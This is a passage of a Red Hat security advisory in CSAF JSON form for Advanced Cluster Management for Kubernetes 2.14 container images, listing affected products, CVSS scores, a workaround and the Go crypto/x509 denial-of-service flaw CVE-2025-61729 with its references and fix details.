"url": "https://access.redhat.com/errata/RHSA-2026:25127"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, implement a timeout in your archive/zip processing logic to abort the operation if it exceeds a few seconds, preventing the application from consuming an excessive amount of resources.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip"
},
{
"cve": "CVE-2025-61729",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2025-12-02T20:01:45.330964+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2418462"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "RHBZ#2418462",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418462"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://go.dev/cl/725920",
"url": "https://go.dev/cl/725920"
},
{
"category": "external",
"summary": "https://go.dev/issue/76445",
"url": "https://go.dev/issue/76445"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4",
"url": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4155",
"url": "https://pkg.go.dev/vuln/GO-2025-4155"
}
],
"release_date": "2025-12-02T18:54:10.166000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T20:51:55+00:00",
"details": "For release note details, see the upstream Submariner release notes:\n\nhttps://submariner.io/community/releases/\n\nDownstream-specific issues resolved:\n* ACM-27238\n* ACM-28294\n* ACM-28295\n* ACM-28311\n* ACM-28313\n* ACM-28314\n* ACM-28315\n* ACM-28316\n* ACM-28329\n* ACM-28331\n* ACM-28333\n* ACM-28335\n* ACM-28337\n* ACM-28339\n* ACM-28342\n* ACM-29317\n* ACM-29511\n* ACM-29613\n* ACM-29614\n* ACM-29631\n* ACM-29632\n* ACM-29633\n* ACM-29634\n* ACM-29776\n* ACM-30134\n* ACM-30726\n* ACM-30727\n* ACM-30728\n* ACM-30729\n* ACM-30970\n* ACM-31136\n* ACM-31831\n* ACM-31840\n* ACM-32575\n* ACM-32842\n* ACM-34108\n* ACM-34586\n* ACM-34589\n\nFor more details, see the Red Hat Advanced Cluster Management for Kubernetes documentation:\n\nhttps://docs.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.14/",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
